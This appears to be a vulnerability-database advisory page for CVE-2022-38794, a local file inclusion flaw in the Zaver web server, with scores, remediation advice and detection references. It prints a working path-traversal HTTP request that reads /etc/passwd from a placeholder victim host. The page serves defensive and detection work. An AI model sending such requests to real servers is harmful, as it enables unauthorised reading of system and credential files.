🔙 목록으로 돌아가기

CVE-2022-38794: Zaver - Local File Inclusion

TitleZaver - Local File Inclusion
Authorpikpikcu
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access, data leakage, and remote code execution.
RemediationTo remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
CVSS Score7.5
EPSS Score0.20998
CVE IDCVE-2022-38794
CWE IDCWE-22
Tags cve cve2022 lfi zaver zaver_project vuln

🔍 Vulnerability Description

Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.

🌐 HTTP Request

GET /../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38794.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-38794.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A